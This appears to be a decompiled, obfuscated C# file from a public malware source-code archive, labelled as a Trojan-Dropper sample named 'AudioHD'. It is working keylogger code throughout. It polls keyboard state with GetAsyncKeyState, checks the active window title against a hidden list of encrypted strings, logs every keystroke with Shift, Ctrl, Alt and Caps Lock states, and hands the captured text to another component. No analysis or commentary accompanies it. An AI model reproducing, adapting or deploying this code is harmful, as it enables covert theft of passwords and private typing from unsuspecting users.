mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
275 lines
14 KiB
C#
275 lines
14 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u000E;
|
|||
|
using System;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
using System.Threading;
|
|||
|
using System.Timers;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace \u0007
|
|||
|
{
|
|||
|
internal sealed class \u0007
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private static \u0008 \u0001;
|
|||
|
private static string \u0001;
|
|||
|
private static string \u0002;
|
|||
|
private static System.Timers.Timer \u0001;
|
|||
|
private static string \u0003;
|
|||
|
private static string \u0004;
|
|||
|
private static bool \u0001;
|
|||
|
private static bool \u0002;
|
|||
|
private static bool \u0003;
|
|||
|
|
|||
|
[DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
|
|||
|
private static extern short \u000F([In] Keys obj0);
|
|||
|
|
|||
|
[DllImport("User32.dll", EntryPoint = "GetAsyncKeyState")]
|
|||
|
private static extern short \u000F([In] int obj0);
|
|||
|
|
|||
|
[DllImport("User32.dll", EntryPoint = "GetWindowText")]
|
|||
|
public static extern int \u000F([In] int obj0, [In] StringBuilder obj1, [In] int obj2);
|
|||
|
|
|||
|
[DllImport("User32.dll", EntryPoint = "GetForegroundWindow")]
|
|||
|
public static extern int \u000F();
|
|||
|
|
|||
|
public static void \u000F()
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0003 = \u0007.\u0007.\u000F();
|
|||
|
\u0007.\u0007.\u0004 = \u0007.\u0007.\u0003;
|
|||
|
\u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
|
|||
|
\u0007.\u0007.\u0001 = new System.Timers.Timer();
|
|||
|
\u0007.\u0007.\u0001.Elapsed += new ElapsedEventHandler(\u0007.\u0007.\u000F);
|
|||
|
\u0007.\u0007.\u0001.Interval = 10.0;
|
|||
|
\u0007.\u0007.\u0001.Enabled = false;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
string upper = \u0007.\u0007.\u000F().ToUpper();
|
|||
|
if (upper.Contains(\u0007.\u0007.\u0001(865)) || upper.Contains(\u0007.\u0007.\u0001(874)) || upper.Contains(\u0007.\u0007.\u0001(891)) || upper.Contains(\u0007.\u0007.\u0001(904)) || upper.Contains(\u0007.\u0007.\u0001(917)) || upper.Contains(\u0007.\u0007.\u0001(926)) || upper.Contains(\u0007.\u0007.\u0001(935)) || upper.Contains(\u0007.\u0007.\u0001(948)) || upper.Contains(\u0007.\u0007.\u0001(965)) || upper.Contains(\u0007.\u0007.\u0001(978)) || upper.Contains(\u0007.\u0007.\u0001(999)) || upper.Contains(\u0007.\u0007.\u0001(1016)) || upper.Contains(\u0007.\u0007.\u0001(1033)) || upper.Contains(\u0007.\u0007.\u0001(1050)))
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0001.Start();
|
|||
|
if (\u0007.\u0007.\u0002 == \u0007.\u0007.\u0001(864))
|
|||
|
\u0007.\u0007.\u0002 = upper;
|
|||
|
}
|
|||
|
else if (\u0007.\u0007.\u0001 != \u0007.\u0007.\u0001(864))
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0001.Stop();
|
|||
|
\u0007.\u0007.\u0001.\u000F(\u0007.\u0007.\u0002, \u0007.\u0007.\u0001);
|
|||
|
\u0007.\u0007.\u0001 = \u0007.\u0007.\u0001(864);
|
|||
|
}
|
|||
|
Thread.Sleep(1000);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static string \u000F()
|
|||
|
{
|
|||
|
int num1 = \u0007.\u0007.\u000F();
|
|||
|
StringBuilder stringBuilder = new StringBuilder(1024);
|
|||
|
int num2 = \u0007.\u0007.\u000F(num1, stringBuilder, stringBuilder.Capacity);
|
|||
|
return num2 <= 0 || num2 > stringBuilder.Length ? \u0007.\u0007.\u0001(1071) : stringBuilder.ToString();
|
|||
|
}
|
|||
|
|
|||
|
private static void \u000F([In] object obj0, [In] ElapsedEventArgs obj1)
|
|||
|
{
|
|||
|
foreach (int num in Enum.GetValues(typeof (Keys)))
|
|||
|
{
|
|||
|
if (\u0007.\u0007.\u000F(num) == (short) -32767)
|
|||
|
{
|
|||
|
if (\u0007.\u0007.\u000F())
|
|||
|
{
|
|||
|
if (!\u0007.\u0007.\u0002)
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0002 = true;
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1084);
|
|||
|
}
|
|||
|
}
|
|||
|
else if (\u0007.\u0007.\u0002)
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0002 = false;
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1097);
|
|||
|
}
|
|||
|
if (\u0007.\u0007.\u0012())
|
|||
|
{
|
|||
|
if (!\u0007.\u0007.\u0001)
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0001 = true;
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1114);
|
|||
|
}
|
|||
|
}
|
|||
|
else if (\u0007.\u0007.\u0001)
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0001 = false;
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1127);
|
|||
|
}
|
|||
|
if (\u0007.\u0007.\u0011())
|
|||
|
{
|
|||
|
if (!\u0007.\u0007.\u0003)
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0003 = true;
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1140);
|
|||
|
}
|
|||
|
}
|
|||
|
else if (\u0007.\u0007.\u0003)
|
|||
|
{
|
|||
|
\u0007.\u0007.\u0003 = false;
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1161);
|
|||
|
}
|
|||
|
if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1182))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1195);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1208))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1221);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1234))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1243);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1260))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1269);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1274))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1283);
|
|||
|
else if (!(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1296)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1330)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1313)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1347)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1360)) && !(Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1373)))
|
|||
|
{
|
|||
|
if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1386))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1395);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1404))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1413);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1422))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1431);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1440))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1445);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1454))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1459);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1468))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1477);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1490))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1503);
|
|||
|
else if (Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1520) || Enum.GetName(typeof (Keys), (object) num) == \u0007.\u0007.\u0001(1529))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1538);
|
|||
|
}
|
|||
|
else
|
|||
|
continue;
|
|||
|
if (\u0007.\u0007.\u0010())
|
|||
|
{
|
|||
|
if (num >= 65 && num <= 122)
|
|||
|
\u0007.\u0007.\u0001 += (string) (object) (char) num;
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1547))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1552);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1557))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1562);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1567))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1572);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1577))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1582);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1587))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1592);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1597))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1602);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1607))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1612);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1617))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1622);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1627))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1632);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1637))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1642);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1647))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1652);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1657))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1662);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1667))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1672);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1677))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1682);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1687))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1692);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1697))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1702);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1707))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1712);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1717))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1722);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1727))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1732);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1737))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1742);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1747))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1752);
|
|||
|
}
|
|||
|
else if (num >= 65 && num <= 122)
|
|||
|
\u0007.\u0007.\u0001 += (string) (object) (char) (num + 32);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1547))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1757);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1557))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1762);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1567))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1767);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1577))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1772);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1587))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1777);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1597))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1782);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1607))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1787);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1617))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1792);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1627))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1797);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1637))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1802);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1657))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1807);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1667))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1812);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1817))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1822);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1677))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1827);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1687))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1832);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1697))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1837);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1707))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1842);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1717))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1847);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1727))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1852);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1737))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1857);
|
|||
|
else if (num.ToString() == \u0007.\u0007.\u0001(1747))
|
|||
|
\u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1862);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[SpecialName]
|
|||
|
public static bool \u000F() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ControlKey) & 32768);
|
|||
|
|
|||
|
[SpecialName]
|
|||
|
public static bool \u0010() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ShiftKey) & 32768);
|
|||
|
|
|||
|
[SpecialName]
|
|||
|
public static bool \u0011() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Capital) & 32768);
|
|||
|
|
|||
|
[SpecialName]
|
|||
|
public static bool \u0012() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Menu) & 32768);
|
|||
|
|
|||
|
static \u0007()
|
|||
|
{
|
|||
|
\u0003.\u000F();
|
|||
|
\u0007.\u0007.\u0001 = new \u0008();
|
|||
|
\u0007.\u0007.\u0002 = \u0007.\u0007.\u0001(864);
|
|||
|
\u0007.\u0007.\u0001 = false;
|
|||
|
\u0007.\u0007.\u0002 = false;
|
|||
|
\u0007.\u0007.\u0003 = false;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|